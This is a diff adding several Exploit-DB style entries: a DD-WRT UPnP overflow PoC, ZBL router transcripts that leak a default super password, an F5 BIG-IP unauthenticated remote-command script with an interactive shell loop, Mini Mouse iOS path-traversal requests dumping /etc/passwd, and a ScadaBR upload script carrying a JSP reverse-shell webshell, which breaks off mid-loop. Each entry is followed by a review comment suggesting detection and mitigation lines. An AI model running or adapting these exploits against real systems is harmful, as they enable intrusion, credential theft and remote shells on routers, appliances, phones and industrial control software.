diff --git a/exploits/hardware/dos/49730.py b/exploits/hardware/dos/49730.py
new file mode 100755
index 000000000..384edb62f
--- /dev/null
+++ b/exploits/hardware/dos/49730.py
@@ -0,0 +1,28 @@
+# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC)
+# Date: 24.03.2021
+# Exploit Author: Selim Enes 'Enesdex' Karaduman
+# Vendor Homepage: https://dd-wrt.com/
+# Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/
+# Version: 45723 or prior
+# Tested on: TP-Link Archer C7
+
+# https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/
+
+import socket
+
+target_ip = "192.168.2.1" # IP Address of Target
+off = "D"*164
+ret_addr = "AAAA" 
+
+payload = off + ret_addr
+
+packet = \
+    'M-SEARCH * HTTP/1.1\r\n' \
+    'HOST:239.255.255.250:1900\r\n' \
+    'ST:uuid:'+payload+'\r\n' \
+    'MX:2\r\n' \
+    'MAN:"ssdp:discover"\r\n' \
+    '\r\n'
+
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+s.sendto(packet, (target_ip, 1900) )
\ No newline at end of file
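Review bot: The header says `Version: 45723 or prior` but gives a defender nothing to act on: no fixed build, no mitigation and no traffic signature. What the script sends is an SSDP `M-SEARCH` to UDP/1900 whose `ST:uuid:` value is 168 bytes (`off` plus `ret_addr`), far longer than a 36-character UUID, and that length is the observable anomaly. I would add two comment lines under the advisory link, `# Detection: SSDP M-SEARCH on UDP/1900 with an ST "uuid:" value longer than a UUID` and `# Mitigation: disable UPnP on the router until a build newer than 45723 is installed (confirm the fixed build against the linked advisory)`.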
diff --git a/exploits/hardware/webapps/49737.txt b/exploits/hardware/webapps/49737.txt
new file mode 100644
index 000000000..7c409d555
--- /dev/null
+++ b/exploits/hardware/webapps/49737.txt
@@ -0,0 +1,82 @@
+# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
+# Date: 31.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com
+
+Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
+Product web page: http://www.zblchina.com | http://www.wd-thailand.com
+Affected version: Firmwre: V100R001
+                  Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
+                  EONU Hardware Version	V3.0
+                  Software: V2.46.02P6T5S
+                  Main Chip: RTL9607
+                  Master Controller, Copyright (c) R&D
+
+Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
+router.
+
+Desc: The application suffers from a privilege escalation
+vulnerability. The limited administrative user (admin:admin)
+can elevate his/her privileges by sending a HTTP GET request
+to the configuration backup endpoint or the password page
+and disclose the http super user password. Once authenticated
+as super, an attacker will be granted access to additional and
+privileged functionalities.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5467
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php
+
+
+31.01.2021
+
+--
+
+
+Get config file and disclose super pwd:
+---------------------------------------
+
+POST /HG104B-ZG-E.config HTTP/1.1
+Host: 192.168.1.1
+Connection: keep-alive
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: https://192.168.1.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://192.168.1.1/system_configure.asp
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
+
+CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=
+
+
+...
+  #web_1
+    user_web_name=super
+    user_web_password=www168nettv
+...
+
+
+Disclose super pwd from system pwd page:
+----------------------------------------
+
+GET /system_password.asp
+Host: 192.168.1.1
+
+...
+var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
+var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
+...
\ No newline at end of file
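Review bot: The advisory ID and its URL disagree: the text has `Advisory ID: ZSL-2021-5467` but the URL ends in `ZSL-2021-5647.php`, so one of them is mistyped and should be checked against the advisory page. The description also says the password is disclosed by "a HTTP GET request to the configuration backup endpoint", while the first transcript is `POST /HG104B-ZG-E.config`; the method should be stated consistently. `Firmwre` in the affected-version line is a typo for `Firmware`. The write-up names no remediation; a closing line such as `Mitigation: replace the default admin and super passwords and keep the web interface unreachable from untrusted networks until the vendor ships a fix` would give the reader something to act on.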
diff --git a/exploits/hardware/webapps/49738.py b/exploits/hardware/webapps/49738.py
new file mode 100755
index 000000000..0ca7f316a
--- /dev/null
+++ b/exploits/hardware/webapps/49738.py
@@ -0,0 +1,92 @@
+# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
+# Exploit Author: Al1ex
+# Vendor Homepage: https://www.f5.com/products/big-ip-services
+# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2
+# CVE : CVE-2021-22986
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+import sys
+
+
+def title():
+    print('''
+      ______ ____    ____  _______       ___     ___    ___    __        ___    ___     ___     ___      __   
+     /      |\   \  /   / |   ____|     |__ \   / _ \  |__ \  /_ |      |__ \  |__ \   / _ \   / _ \    / /   
+    |  ,----' \   \/   /  |  |__    ______ ) | | | | |    ) |  | |  ______ ) |    ) | | (_) | | (_) |  / /_   
+    |  |       \      /   |   __|  |______/ /  | | | |   / /   | | |______/ /    / /   \__, |  > _ <  | '_ \  
+    |  `----.   \    /    |  |____       / /_  | |_| |  / /_   | |       / /_   / /_     / /  | (_) | | (_) | 
+     \______|    \__/     |_______|     |____|  \___/  |____|  |_|      |____| |____|   /_/    \___/   \___/                                                                                                                                                                             
+    
+                                Author:Al1ex@Heptagram
+                                Github:https://github.com/Al1ex
+    ''')   
+
+def exploit(url):
+	target_url = url + '/mgmt/shared/authn/login'
+	data = {
+		"bigipAuthCookie":"",
+		"username":"admin",
+		"loginReference":{"link":"/shared/gossip"},
+		"userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}
+	}
+	headers = {
+		"User-Agent": "hello-world",
+		"Content-Type":"application/x-www-form-urlencoded"
+	}
+	response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)
+	if "/mgmt/shared/authz/tokens/" not in response.text:
+		print('(-) Get token fail !!!')
+		print('(*) Tested Method 2:') 
+		header_2 = {
+		    'User-Agent': 'hello-world',
+		    'Content-Type': 'application/json',
+		    'X-F5-Auth-Token': '',
+		    'Authorization': 'Basic YWRtaW46QVNhc1M='
+		}
+		data_2 = {
+			"command": "run", 
+			"utilCmdArgs": "-c whoami"
+		}
+		check_url = url + '/mgmt/tm/util/bash'
+		try:
+			response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)
+			if response2.status_code == 200 and 'commandResult' in response2.text:
+				while True:
+					cmd = input("(:CMD)> ")
+					data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)}
+					r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)
+					if r.status_code == 200 and 'commandResult' in r.text:
+						print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+			else:
+				print('(-) Not vuln...')
+				exit(0)
+		except Exception:
+			print('ERROR Connect')
+	print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]))
+	while True:
+		cmd = input("(:CMD)> ")
+		headers = {
+			"Content-Type": "application/json",
+			"X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])
+		}
+		data_json = {
+			"command": "run", 
+			"utilCmdArgs": "-c \'%s\'"%(cmd)
+		}
+		exp_url= url + '/mgmt/tm/util/bash'
+		exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)
+		if exp_req.status_code == 200 and 'commandResult' in exp_req.text:
+			print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+		else:
+			print('(-) Not vuln...')
+			exit(0)
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 2):
+    	print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0]))
+    	exit(0)
+    else:
+    	exploit(sys.argv[1])
\ No newline at end of file
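Review bot: `exploit()` has no docstring although it tries two different request shapes, and the header gives affected ranges without anything a defender can use. A docstring should say that the first POST to `/mgmt/shared/authn/login` requests a token with a `loginReference` that points at an internal link, and that the fallback sends an empty `X-F5-Auth-Token` together with a Basic `Authorization` header to `/mgmt/tm/util/bash`; both shapes are usable as log signatures on the iControl REST endpoint. Below the CVE line I would add `# Mitigation: upgrade to the fixed releases listed under Version and restrict management-interface and self-IP access to iControl REST`. The Version line also has a typo (`amd` for `and`).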
diff --git a/exploits/ios/webapps/49747.txt b/exploits/ios/webapps/49747.txt
new file mode 100644
index 000000000..0e9c08659
--- /dev/null
+++ b/exploits/ios/webapps/49747.txt
@@ -0,0 +1,397 @@
+# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
+# Author: gosh
+# Date: 05-04-2021
+# Vendor Homepage: http://yodinfo.com 
+# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
+# Version: 9.3.0
+# Tested on: iPhone; iOS 14.4.2
+
+GET /op=get_device_info HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 0
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+	"ret_code":	1,
+	"ret_msg":	"success",
+	"data":	{
+		"uuid":	"7E07125B-61BE-4F12-820C-FA706C445219",
+		"model":	"iPhone",
+		"sys_name":	"iOS",
+		"sys_version":	"14.4.2",
+		"battery_state":	0,
+		"battery_level":	-1,
+		"memery_total_size":	2983772160,
+		"device_name":	"mobile",
+		"user_name":	"iPhone",
+		"pwd":	"",
+		"dir_user":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
+		"dir_doc":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
+		"dir_desktop":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
+		"sys_type":	3
+	}
+}
+
+
+
+-------------------------------------------------------------------------------------
+
+
+POST /op=get_file_list HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 0
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+	"ret_code":	1,
+	"ret_msg":	"success",
+	"data":	{
+		"list":	[{
+				"path":	"//usr",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"usr",
+				"name_display":	"usr",
+				"file_size":	288,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//bin",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"bin",
+				"name_display":	"bin",
+				"file_size":	128,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//sbin",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"sbin",
+				"name_display":	"sbin",
+				"file_size":	544,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//.file",
+				"is_local":	true,
+				"is_hide":	true,
+				"is_floder":	false,
+				"name":	".file",
+				"name_display":	".file",
+				"file_size":	0,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//etc",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"etc",
+				"name_display":	"etc",
+				"file_size":	11,
+				"create_time":	1577865.600000,
+				"update_time":	1577865.600000,
+				"sys_type":	3
+			}, {
+				"path":	"//System",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"System",
+				"name_display":	"System",
+				"file_size":	128,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//var",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"var",
+				"name_display":	"var",
+				"file_size":	11,
+				"create_time":	1577865.600000,
+				"update_time":	1577865.600000,
+				"sys_type":	3
+			}, {
+				"path":	"//Library",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Library",
+				"name_display":	"Library",
+				"file_size":	672,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//private",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"private",
+				"name_display":	"private",
+				"file_size":	224,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//dev",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"dev",
+				"name_display":	"dev",
+				"file_size":	1395,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//.ba",
+				"is_local":	true,
+				"is_hide":	true,
+				"is_floder":	true,
+				"name":	".ba",
+				"name_display":	".ba",
+				"file_size":	64,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//.mb",
+				"is_local":	true,
+				"is_hide":	true,
+				"is_floder":	true,
+				"name":	".mb",
+				"name_display":	".mb",
+				"file_size":	64,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//tmp",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"tmp",
+				"name_display":	"tmp",
+				"file_size":	15,
+				"create_time":	1577865.600000,
+				"update_time":	1577865.600000,
+				"sys_type":	3
+			}, {
+				"path":	"//Applications",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Applications",
+				"name_display":	"Applications",
+				"file_size":	3296,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//Developer",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Developer",
+				"name_display":	"Developer",
+				"file_size":	64,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//cores",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"cores",
+				"name_display":	"cores",
+				"file_size":	64,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}]
+	}
+}
+
+-------------------------
+using the data found: 
+/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download
+
+POST /op=get_file_list HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 101
+
+{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+	"ret_code":	1,
+	"ret_msg":	"success",
+	"data":	{
+		"list":	[{
+				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"GDT",
+				"name_display":	"GDT",
+				"file_size":	96,
+				"create_time":	1617228.400302,
+				"update_time":	1617228.400302,
+				"sys_type":	3
+			}, {
+				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	false,
+				"name":	"input_photo.jpg",
+				"name_display":	"input_photo.jpg",
+				"file_size":	6141491,
+				"create_time":	1617583.738397,
+				"update_time":	1617583.738402,
+				"sys_type":	3
+			}, {
+				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Ico",
+				"name_display":	"Ico",
+				"file_size":	64,
+				"create_time":	1617583.334913,
+				"update_time":	1617583.334913,
+				"sys_type":	3
+			}, {
+				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Download",
+				"name_display":	"Download",
+				"file_size":	64,
+				"create_time":	1617228.371587,
+				"update_time":	1617228.371587,
+				"sys_type":	3
+			}]
+	}
+}
+
+----------------------------------------------------------------------
+
+GET /file=/etc/passwd HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 4
+
+{}
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/octet-stream
+Content-Range: bytes 0-0/2018
+Content-Length : 2018
+
+##
+# User Database
+# 
+# This file is the authoritative user database.
+##
+
+nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
+root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
+mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
+daemon:*:1:1:System Services:/var/root:/usr/bin/false
+_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
+_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
+_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
+_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
+_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
+_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
+_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
+_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
+_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
+_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
+_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
+_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
+_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
+_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
+_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
+_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
+_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
+_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
+_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
+_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
+_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
+_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
+_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
+_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
+_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
+_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false
\ No newline at end of file
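Review bot: The file is only raw request/response transcripts with no description of the flaw, so the reader has to infer it. As shown, none of the requests carries a credential or token (`"pwd": ""` in the device info), `op=get_file_list` accepts an arbitrary `path`, and `GET /file=/etc/passwd` returns a file outside the app container; a short `Desc:` paragraph stating this belongs under the header. The responses also send `Access-Control-Allow-Origin: *` from an unauthenticated service, which presumably lets any web page opened on the same network read them and is worth listing as a second weakness. A remediation line is missing as well, for example `Fix: require authentication on the embedded server and confine file= and path to the app's own Documents directory`.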
diff --git a/exploits/linux/webapps/49735.py b/exploits/linux/webapps/49735.py
new file mode 100755
index 000000000..a68e7a479
--- /dev/null
+++ b/exploits/linux/webapps/49735.py
@@ -0,0 +1,115 @@
+# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
+# Date: 04/21
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://www.scadabr.com.br/ 
+# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
+# Tested on: Debian9,10~Ubuntu16.04
+
+#!/usr/bin/python
+
+import requests,sys,time
+
+
+if len(sys.argv) <=6:
+    print('[x] Missing arguments ... ')
+    print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>')
+    print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444')
+    sys.exit(0)
+else:   
+    time.sleep(1)
+
+host = sys.argv[1]
+port = sys.argv[2]
+user = sys.argv[3]
+passw = sys.argv[4]
+rev_host = sys.argv[5]
+rev_port = sys.argv[6]
+
+flag = False
+LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
+PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'
+
+
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+|    _________                  .___     ____________________       |
+|   /   _____/ ____ _____     __| _/____ \______   \______   \      |
+|   \_____  \_/ ___\\__  \   / __ |\__  \ |    |  _/|       _/       |
+|   /        \  \___ / __ \_/ /_/ | / __ \|    |   \|    |   \      |
+|  /_______  /\___  >____  /\____ |(____  /______  /|____|_  /      |
+|          \/     \/     \/      \/     \/       \/        \/       |
+|                                                                   |
+|    > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload   |
+|    > Exploit Author : Fellipe Oliveira                            |
+|    > Exploit for Linux Systems                                    |
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+'''
+
+def main():
+    payload = {
+        'username': user,
+        'password': passw
+    }
+
+    print(banner)
+    time.sleep(2)
+   
+    with requests.session() as s:
+        s.post(LOGIN, data=payload)
+	response = s.get(PROTECTED_PAGE)
+
+        print "[+] Trying to authenticate "+LOGIN+"..."
+	if response.status_code == 200:
+	    print "[+] Successfully authenticated! :D~\n"
+	    time.sleep(2)
+	else:
+	    print "[x] Authentication failed :("
+            sys.exit(0)
+
+
+        burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
+	burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
+	burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
+	burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n    InputStream is;\n    OutputStream os;\n    StreamConnector(InputStream is, OutputStream os) {\n        this.is = is;\n        this.os = os;\n    }\n    public void run() {\n        BufferedReader isr = null;\n        BufferedWriter osw = null;\n        try {\n            isr = new BufferedReader(new InputStreamReader(is));\n            osw = new BufferedWriter(new OutputStreamWriter(os));\n            char buffer[] = new char[8192];\n            int lenRead;\n            while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n                osw.write(buffer, 0, lenRead);\n                osw.flush();\n            }\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n        try {\n            if (isr != null)\n                isr.close();\n            if (osw != null)\n                osw.close();\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n    }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. 
This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n    String ipAddress = request.getParameter(\"ipaddress\");\n    String ipPort = request.getParameter(\"port\");\n    Socket sock = null;\n    Process proc = null;\n    if (ipAddress != null && ipPort != null) {\n        try {\n            sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n            System.out.println(\"socket created: \" + sock.toString());\n            Runtime rt = Runtime.getRuntime();\n            proc = rt.exec(\"/bin/bash\");\n            System.out.println(\"process /bin/bash started: \" + proc.toString());\n            StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n            System.out.println(\"outputConnector created: \" + outputConnector.toString());\n            StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n            System.out.println(\"inputConnector created: \" + inputConnector.toString());\n            outputConnector.start();\n            inputConnector.start();\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n    }\n    if (sock != null && proc != null) {\n        out.println(\"<div class='separator'></div>\");\n        out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n    }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; 
name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n"
+	getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+
+	print('[>] Attempting to upload .jsp Webshell...')
+	time.sleep(1)
+        print('[>] Verifying shell upload...\n')
+	time.sleep(2)
+	
+	if getdata.status_code == 200:
+	    print('[+] Upload Successfuly! \n')
+	    
+	    for num in range(1,1000):	    
+	    	PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
+                find = s.get(PATH)
+
+                if find.status_code == 200:	
+                    print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
+                    print('[>] Spawning Reverse Shell...\n')
+                    time.sleep(3)                    
